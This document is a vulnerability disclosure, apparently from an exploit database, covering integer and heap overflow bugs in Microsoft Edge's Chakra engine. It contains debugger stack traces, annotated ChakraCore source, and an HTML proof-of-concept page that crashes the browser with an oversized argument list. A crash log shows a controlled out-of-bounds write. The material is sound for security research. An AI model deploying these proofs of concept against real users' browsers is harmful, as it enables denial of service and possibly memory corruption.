00007ffd`2d952850 : 0000019d`f64e8aa0 0000019d`ffffffff 0000019d`ffffffff 0000006a`ffffffff : chakra!EmitArgList+0x9c
00007ffd`2d8d3768 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!EmitNew+0x16c
00007ffd`2d8d2c55 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!Emit+0x15d8
00007ffd`2d8dd790 : 0000019d`f64e8810 0000006a`8f7fb8f0 0000019d`f75e3040 0000006a`00000001 : chakra!Emit+0xac5
00007ffd`2d8db4b9 : 0000006a`8f7fb8f0 0000019d`f64e8810 0000019d`f75e3040 0000006a`00000001 : chakra!ByteCodeGenerator::EmitTopLevelStatement+0x80
00007ffd`2d8daee5 : 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 0000019d`f75e3040 : chakra!ByteCodeGenerator::EmitGlobalBody+0x75
00007ffd`2d8da274 : 0000006a`8f7fb8f0 0000019d`f64e8030 0000019d`f75e3030 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitOneFunction+0xa75
00007ffd`2d9826aa : 0000006a`8f7fb8f0 0000019d`f64e8030 00000000`00000000 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitScopeList+0x164
00007ffd`2d982541 : 0000019d`f64e8030 0000019d`00003c22 0000006a`8f7fb8f0 0000006a`8f7fbb30 : chakra!ByteCodeGenerator::Generate+0x142
00007ffd`2d7a2820 : 0000019d`f64e8030 0000019d`00003c22 0000019d`f2b2d110 0000006a`8f7fbb30 : chakra!GenerateByteCode+0x8d
00007ffd`2d748201 : 0000019d`f2b2d110 0000019d`f67c0020 0000019d`00050022 0000006a`00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x380
00007ffd`2d747fb8 : 0000019d`f6260000 00007ffd`2de79f80 0000019d`00000000 0000019d`f625c000 : chakra!Js::GlobalObject::VEval+0x231
00007ffd`2d747ecd : 0000006a`8f7fc0d0 0000019d`f625b5c0 0000019d`f2b2a150 0000006a`8f7fc090 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ffd`2d9a6be3 : 0000019d`f625b5c0 00000000`18000003 0000019d`f6270020 0000019d`f628ef00 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000018 0000006a`8f7fc330 00000000`00000006 : chakra!amd64_CallFunction+0x93
00007ffd`2d7571ac : 0000019d`f625b5c0 00007ffd`2d747e50 0000006a`8f7fc1a0 0000006a`8f7fc330 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffd`2d7577b4 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`f625b5c0 00007ffd`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ffd`2d834920 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`8f7fc330 0000019d`f64e00a8 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ffd`2d82ff2c : 0000006a`8f7fc330 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
00007ffd`2d8c80cc : 0000006a`8f7fc330 0000019d`f64c0000 0000006a`8f7fc4f0 00007ffd`4cc05401 : chakra!Js::InterpreterStackFrame::Process+0x12c
00007ffd`2d8c7be1 : 0000019d`f6280420 0000006a`8f7fc6d0 0000019d`f6500fc2 0000006a`8f7fc6e8 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000019d`f6500fc2 : 0000006a`8f7fc720 00000000`00000000 00000000`00000000 00007ffd`2d9a6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ffd`2d9a6be3 : 0000019d`f6280420 00000000`00000000 00000000`00000000 00000000`00000000 : 0x19d`f6500fc2
00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000000 0000019d`f2b50c00 00007ffd`2d8aa837 : chakra!amd64_CallFunction+0x93
00007ffd`2d8c1810 : 0000019d`f6280420 00007ffd`2d9a6df0 0000006a`8f7fc820 0000019d`f2b2d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffd`2d8c0a37 : 0000019d`f6280420 0000006a`8f7fc910 0000019d`f2b2d110 00007ffd`4a167100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
00007ffd`2d98907e : 0000019d`f6280420 0000006a`8f7fc970 0000019d`f2b2d110 0000019d`f2b2da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
00007ffd`2d8ecd54 : 0000019d`f6280420 0000006a`8f7fc9b0 00000000`00000000 0000006a`8f7fc9c8 : chakra!ScriptSite::CallRootFunction+0x6a
00007ffd`2d881b49 : 0000019d`f2b2d000 0000019d`f6280420 0000006a`8f7fca60 00000000`00000000 : chakra!ScriptSite::Execute+0x124
00007ffd`2d882e8e : 0000019d`f2b29d00 0000006a`8f7fcf68 0000006a`8f7fcfa0 0000006a`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
00007ffd`2d883121 : 0000019d`f2b29d00 0000019d`f370c4c4 00000000`00000000 0000019d`f2cb4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
00007ffd`2e393c75 : 0000019d`f2b29d50 0000019d`f370c4c4 0000019d`0000008a 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
00007ffd`2e393abe : 00000000`00000000 0000006a`8f7fce39 0000019d`f2cb4260 0000019d`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
00007ffd`2e3935d7 : 00000000`00000000 0000019d`f2cb4260 0000019d`f2c3c1c0 0000019d`f2cb41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
00007ffd`2e392f07 : 0000019d`f2c50c01 0000019d`f2cac100 0000019d`00000082 00007ffd`00000000 : edgehtml!CScriptData::CommitCode+0x357
00007ffd`2e452f8d : 00000000`ffffffff 0000019d`f2c3c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
00007ffd`2e2943d4 : 00000000`00000000 0000019d`f2c8c440 00000000`00000001 00007ffd`2e44ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
00007ffd`2e2934a1 : 0000019d`f2c50c00 00000000`00000000 0000019d`f2c50c00 0000019d`f2c2c8c0 : edgehtml!CHtmParseBase::Execute+0x204
00007ffd`2e44d23b : 00000000`00019717 0000019d`f2c20000 0000019d`f2c800b0 0000019d`f2c2c8c0 : edgehtml!CHtmPost::Exec+0x1e1
00007ffd`2e44d11f : 0000019d`f2c2c8c0 00000000`00019717 0000019d`f37e6dc0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
00007ffd`2e44cfd3 : 0000019d`f2c20000 00000000`06363701 00000000`00000002 0000019d`f2c61740 : edgehtml!PostManExecute+0x63
00007ffd`2e44ce6d : 0000019d`f2c2c8c0 00000000`06363729 0000019d`00000000 00007ffd`41cd4779 : edgehtml!PostManResume+0xa3
00007ffd`2e45b353 : 0000019d`f2c48600 0000019d`f3734bd0 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
00007ffd`2e4350db : 0000019d`f2c282d0 0000019d`f2b25491 0000019d`f2b02200 0000006a`8f7fd4f0 : edgehtml!CDwnChan::OnMethodCall+0x23
00007ffd`2e2c1706 : 0000019d`f2b02728 0000019d`f2c61740 0000019d`f2b02260 0000006a`8f7fd520 : edgehtml!GWndAsyncTask::Run+0x1b
00007ffd`2e40a860 : 00000000`0e877146 0000019d`f2c617a0 0000019d`f2c800b0 00007ffd`2e369138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
00007ffd`2e40a683 : 0000019d`f3734bd0 00000000`00000000 00000000`00000002 0000019d`f2c28170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
00007ffd`2e2c22b3 : 0000006a`8f7fd9d0 00000000`00008002 0000019d`f2c28170 00007ffd`4ca147df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
00007ffd`2e2c07a5 : 00000000`00008002 0000019d`f2c20000 000042e1`6a33249e 00007ffd`2e33721d : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
00007ffd`4c9fbc50 : 00000000`00010442 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
00007ffd`4c9fb5cf : 00000195`f12868c0 00007ffd`2e2c0680 00000000`00010442 00000000`00010442 : USER32!UserCallWinProcCheckWow+0x280
00007ffd`2c876d0e : 0000006a`8f7fd970 00000000`00000000 00000195`f0cd3840 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
00007ffd`2c88eecb : 00000000`00000000 00000000`00000001 00000195`f0f29cd0 00000195`f0cc3960 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
00007ffd`38a2b4a8 : 00000000`00000000 00000195`f0f28990 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
00007ffd`4ada2774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
00007ffd`4cc10d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
The root cause of the nullptr derefrencing is an overflow in Parser::ParseArgList
//ChakraCore-master\lib\Parser\Parse.cpp
/***************************************************************************
Parse a list of arguments.
***************************************************************************/
template<bool buildAST>
ParseNodePtr Parser::ParseArgList( bool *pCallOfConstants, uint16 *pSpreadArgCount, uint16 * pCount)
{
ParseNodePtr pnodeArg;
ParseNodePtr pnodeList = nullptr;
ParseNodePtr *lastNodeRef = nullptr;
// Check for an empty list
Assert(m_token.tk == tkLParen);
if (m_pscan->Scan() == tkRParen)
{
return nullptr;
}
*pCallOfConstants = true;
*pSpreadArgCount = 0;
int count=0;
while (true)
{
// the count of arguments has to fit in an unsigned short
if (count > 0xffffU) //SHOULD BE if (count >= oxffffU)
Error(ERRnoMemory);
// Allow spread in argument lists.
IdentToken token;
pnodeArg = ParseExpr<buildAST>(koplCma, nullptr, TRUE, /* fAllowEllipsis */TRUE, NULL, nullptr, nullptr, &token);
++count; //when count==0xffffU, an overflow occurs HERE!!!
this->MarkEscapingRef(pnodeArg, &token);
if (buildAST)
{
this->CheckArguments(pnodeArg);
if (*pCallOfConstants && !IsConstantInFunctionCall(pnodeArg))
{
*pCallOfConstants = false;
}
if (pnodeArg->nop == knopEllipsis)
{
(*pSpreadArgCount)++;
}
AddToNodeListEscapedUse(&pnodeList, &lastNodeRef, pnodeArg);
}
if (m_token.tk != tkComma)
{
break;
}
m_pscan->Scan();
if (m_token.tk == tkRParen && m_scriptContext->GetConfig()->IsES7TrailingCommaEnabled())
{
break;
}
}
if (pSpreadArgCount!=nullptr && (*pSpreadArgCount) > 0){
CHAKRATEL_LANGSTATS_INC_LANGFEATURECOUNT(SpreadFeature, m_scriptContext);
}
*pCount = static_cast<uint16>(count);
if (buildAST)
{
AssertMem(lastNodeRef);
AssertNodeMem(*lastNodeRef);
pnodeList->ichLim = (*lastNodeRef)->ichLim;
}
return pnodeList;
}
-->
<html>
<head>
<title> POC </title>
</head>
<script>
var a=[];
a.length=0xFFFF+1;
a.fill('...a');
var b="function Car(){}; var car=new Car("+a.join()+");";
//alert(b);
eval(b);
</script>
</html>

294
platforms/windows/dos/42468.html Executable file
View file

@ -0,0 +1,294 @@
<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
This is the HEAP BASED OVERFLOW version of the issue.
// ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
{
[...]
if (!isAsmJs && executeFunction->IsCoroutine())
{
[...]
}
else
{
InterpreterStackFrame::Setup setup(function, args);
size_t varAllocCount = setup.GetAllocationVarCount();
//printf("varAllocCount: %d(%X)\r\n", varAllocCount, varAllocCount);
size_t varSizeInBytes = varAllocCount * sizeof(Var);
//
// Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
//
DWORD_PTR stackAddr;
// If the locals area exceeds a certain limit, allocate it from a private arena rather than
// this frame. The current limit is based on an old assert on the number of locals we would allow here.
if (varAllocCount > InterpreterStackFrame::LocalsThreshold) //we can make this condition satisfied so the buffer will be allocated on the heap instead of the stack!!!
{
ArenaAllocator *tmpAlloc = nullptr;
fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);
allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);
stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)
}
else
{
PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);
allocation = (Var*)_alloca(varSizeInBytes);
#if DBG
memset(allocation, 0xFE, varSizeInBytes);
#endif
stackAddr = reinterpret_cast<DWORD_PTR>(allocation);
}
[...]
return aReturn;
}
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff7`49700000 00007ff7`49725000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffa`13700000 00007ffa`138db000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffa`119f0000 00007ffa`11a9e000 C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffa`0fd90000 00007ffa`0ffd9000 C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffa`0e140000 00007ffa`0e1be000 C:\Windows\SYSTEM32\apphelp.dll
ModLoad: 00007ffa`11b80000 00007ffa`11e79000 C:\Windows\System32\combase.dll
ModLoad: 00007ffa`103f0000 00007ffa`104e6000 C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffa`11160000 00007ffa`11285000 C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffa`104f0000 00007ffa`1055a000 C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffa`11630000 00007ffa`116cd000 C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffa`0a400000 00007ffa`0a460000 C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffa`10c90000 00007ffa`10d50000 C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffa`0fcd0000 00007ffa`0fd6a000 C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffa`0fc00000 00007ffa`0fc11000 C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ff9`f3680000 00007ff9`f3a44000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffa`10560000 00007ffa`10c52000 C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffa`11940000 00007ffa`119e1000 C:\Windows\System32\advapi32.dll
ModLoad: 00007ffa`11b20000 00007ffa`11b79000 C:\Windows\System32\sechost.dll
ModLoad: 00007ffa`113e0000 00007ffa`11431000 C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffa`10c60000 00007ffa`10c87000 C:\Windows\System32\GDI32.dll
ModLoad: 00007ffa`10200000 00007ffa`10388000 C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffa`10d60000 00007ffa`10eaa000 C:\Windows\System32\USER32.dll
ModLoad: 00007ffa`0fd70000 00007ffa`0fd8e000 C:\Windows\System32\win32u.dll
ModLoad: 00007ffa`11790000 00007ffa`1183a000 C:\Windows\System32\shcore.dll
ModLoad: 00007ffa`0fb70000 00007ffa`0fbbc000 C:\Windows\System32\powrprof.dll
ModLoad: 00007ffa`0fbc0000 00007ffa`0fbd5000 C:\Windows\System32\profapi.dll
ModLoad: 00007ffa`08380000 00007ffa`08606000 C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffa`0ee70000 00007ffa`0eea1000 C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffa`0fa70000 00007ffa`0fa99000 C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ff9`ff7d0000 00007ff9`ff7f6000 C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffa`0f200000 00007ffa`0f2a4000 C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffa`0f5c0000 00007ffa`0f5d7000 C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffa`115b0000 00007ffa`1161c000 C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffa`10d50000 00007ffa`10d58000 C:\Windows\System32\NSI.dll
ModLoad: 00007ffa`11730000 00007ffa`1175d000 C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffa`0f1c0000 00007ffa`0f1f7000 C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffa`0e540000 00007ffa`0e6b0000 C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffa`0fa40000 00007ffa`0fa65000 C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffa`0eca0000 00007ffa`0ecc1000 C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ff9`ff580000 00007ff9`ff5f4000 C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffa`054d0000 00007ffa`054f2000 C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffa`045d0000 00007ffa`045eb000 C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffa`11290000 00007ffa`113d5000 C:\Windows\System32\ole32.dll
ModLoad: 00007ffa`0e370000 00007ffa`0e405000 C:\Windows\system32\uxtheme.dll
ModLoad: 00007ff9`f1650000 00007ff9`f2d01000 C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffa`0c190000 00007ffa`0c2c9000 C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ff9`f0e60000 00007ff9`f164b000 C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffa`04630000 00007ffa`0466f000 C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffa`0c840000 00007ffa`0c8b6000 C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffa`0c6f0000 00007ffa`0c77f000 C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffa`0cb10000 00007ffa`0cca6000 C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffa`04d30000 00007ffa`04dfb000 C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffa`09f90000 00007ffa`0a096000 C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffa`0a230000 00007ffa`0a2b2000 C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffa`0b640000 00007ffa`0b912000 C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffa`0da10000 00007ffa`0daf3000 C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffa`0c6d0000 00007ffa`0c6e5000 C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffa`0abe0000 00007ffa`0b111000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffa`11e80000 00007ffa`132b7000 C:\Windows\System32\shell32.dll
ModLoad: 00007ffa`101b0000 00007ffa`101f9000 C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffa`0ccb0000 00007ffa`0ccda000 C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ff9`ff8e0000 00007ff9`ffc0e000 C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffa`0faa0000 00007ffa`0fad0000 C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffa`11440000 00007ffa`115a6000 C:\Windows\System32\msctf.dll
ModLoad: 00007ffa`0a0a0000 00007ffa`0a1a2000 C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ff9`fddf0000 00007ff9`fde00000 C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffa`00260000 00007ffa`0027b000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffa`0a370000 00007ffa`0a3d9000 C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffa`07430000 00007ffa`07507000 C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffa`0f420000 00007ffa`0f47c000 C:\Windows\system32\mswsock.dll
ModLoad: 00007ffa`0a730000 00007ffa`0a73b000 C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffa`07260000 00007ffa`07428000 C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffa`0f5e0000 00007ffa`0f5eb000 C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ff9`fe760000 00007ff9`fe77a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ff9`f3a50000 00007ff9`f3bda000 C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffa`0e1d0000 00007ffa`0e1ed000 C:\Windows\System32\rmclient.dll
ModLoad: 00007ff9`fd750000 00007ff9`fd768000 C:\Windows\System32\UiaManager.dll
ModLoad: 00007ff9`fb720000 00007ff9`fb767000 C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffa`0d180000 00007ffa`0d45f000 C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffa`0db30000 00007ffa`0dc52000 C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffa`0e9e0000 00007ffa`0ea84000 C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ff9`fc470000 00007ff9`fc4f2000 C:\Windows\system32\twinapi.dll
ModLoad: 00007ffa`060c0000 00007ffa`060e8000 C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffa`0ffe0000 00007ffa`101a9000 C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffa`0fbe0000 00007ffa`0fbf1000 C:\Windows\System32\MSASN1.dll
ModLoad: 00007ff9`f8480000 00007ff9`f84fa000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
ModLoad: 00007ff9`ff120000 00007ff9`ff17d000 C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffa`0d460000 00007ffa`0da04000 C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffa`06cf0000 00007ffa`06faf000 C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ff9`f8060000 00007ff9`f80ba000 C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffa`06950000 00007ffa`0695f000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffa`0b1c0000 00007ffa`0b202000 C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffa`0b150000 00007ffa`0b1b7000 C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ff9`fbc20000 00007ff9`fbc8b000 C:\Windows\System32\oleacc.dll
ModLoad: 00007ffa`06480000 00007ffa`06490000 C:\Windows\system32\msimtf.dll
ModLoad: 00007ffa`06ab0000 00007ffa`06b38000 C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ff9`fe370000 00007ff9`fe411000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffa`06760000 00007ffa`06774000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffa`05a10000 00007ffa`05a48000 C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffa`06b40000 00007ffa`06cc8000 C:\Windows\SYSTEM32\windows.globalization.dll
(11fc.108c): Access violation - code c0000005 (!!! second chance !!!)
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ff9`f124bcad 488904d1 mov qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
0:016> r
rax=0001000042424242 rbx=000000388f1fb8b0 rcx=0000015e3d5401b0
rdx=0000000000001fca rsi=0000000000000002 rdi=000000388f1fb3c0
rip=00007ff9f124bcad rsp=000000388f1fbae0 rbp=000000388f1fbb10
r8=0000015e3d500030 r9=0000015e2c538000 r10=000000388f1fb918
r11=0000015e2c53c000 r12=0000000000000000 r13=0000015e2932a120
r14=0000000000000000 r15=0000015e4063f9b3
iopl=0 nv up ei pl nz ac pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010210
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ff9`f124bcad 488904d1 mov qword ptr [rcx+rdx*8],rax ds:0000015e`3d550000=????????????????
0:016> dq ecx
0000015e`3d5401b0 00000000`00000000 00010000`42424242
0000015e`3d5401c0 00010000`42424242 00010000`42424242
0000015e`3d5401d0 00010000`42424242 00010000`42424242
0000015e`3d5401e0 00010000`42424242 00010000`42424242
0000015e`3d5401f0 00010000`42424242 00010000`42424242
0000015e`3d540200 00010000`42424242 00010000`42424242
0000015e`3d540210 00010000`42424242 00010000`42424242
0000015e`3d540220 00010000`42424242 00010000`42424242
0:016> dq [ecx+edx*8]
0000015e`3d550000 ????????`???????? ????????`????????
0000015e`3d550010 ????????`???????? ????????`????????
0000015e`3d550020 ????????`???????? ????????`????????
0000015e`3d550030 ????????`???????? ????????`????????
0000015e`3d550040 ????????`???????? ????????`????????
0000015e`3d550050 ????????`???????? ????????`????????
0000015e`3d550060 ????????`???????? ????????`????????
0000015e`3d550070 ????????`???????? ????????`????????
0:016> !address ecx
Failed to map Heaps (error 8007001e)
Usage: <unclassified>
Allocation Base: 0000015e`3d500000
Base Address: 0000015e`3d500000
End Address: 0000015e`3d550000
Region Size: 00000000`00050000
Type: 00020000 MEM_PRIVATE
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
0:016> !address 0000015e`3d550000
Usage: Free
Base Address: 0000015e`3d550000
End Address: 0000015e`3d7f0000
Region Size: 00000000`002a0000
Type: 00000000
State: 00010000 MEM_FREE
Protect: 00000001 PAGE_NOACCESS
0:016> kb
RetAddr : Args to Child : Call Site
00007ff9`f10fe96d : 0000015e`3d500030 0000015e`4063f9ac 00000038`8f1fbb70 0000015e`4063f9ac : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ff9`f0f5ffb1 : 0000015e`3d500030 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x19e8fd
00007ff9`f0ff80cc : 0000015e`3d500030 0000015e`3c7a01a0 00000038`8f1fbc30 00007ff9`f0ebc500 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00007ff9`f0ff7be1 : 0000015e`2c560600 00000038`8f1fbe10 0000015e`3c7e0fba 00000038`8f1fbe28 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000015e`3c7e0fba : 00000038`8f1fbe60 0000015e`2c560600 ffffffff`fffffffe 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ff9`f0e783df : 0000015e`2c560600 00000000`04000001 0000015e`2c550020 00000038`8f1fbef0 : 0x15e`3c7e0fba
00007ff9`f0e7816a : 0000015e`3c7a01a0 0000015e`2c560600 00007ff9`f15a9f80 00000038`8f1fbef0 : chakra!Js::GlobalObject::ExecuteEvalParsedFunction+0x77
00007ff9`f0e77fb8 : 0000015e`2c540000 00007ff9`f15a9f80 0000015e`00000000 0000015e`2c53c000 : chakra!Js::GlobalObject::VEval+0x19a
00007ff9`f0e77ecd : 00000038`8f1fc040 0000015e`2c53b5c0 0000015e`2932a120 00000038`8f1fc000 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ff9`f10d6be3 : 0000015e`2c53b5c0 00000000`18000003 0000015e`2c550020 0000015e`2c54d770 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000018 00000038`8f1fc0e8 0000015e`2c53c000 : chakra!amd64_CallFunction+0x93
00007ff9`f0e871ac : 0000015e`2c53b5c0 00007ff9`f0e77e50 00000038`8f1fc110 00000038`8f1fc2a0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ff9`f0e877b4 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`2c53b5c0 00007ff9`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ff9`f0f64920 : 00000038`8f1fc2a0 0000015e`3c7c0116 0000015e`8f1fc2a0 0000015e`3c7c0124 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ff9`f0f5ff2c : 00000038`8f1fc2a0 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
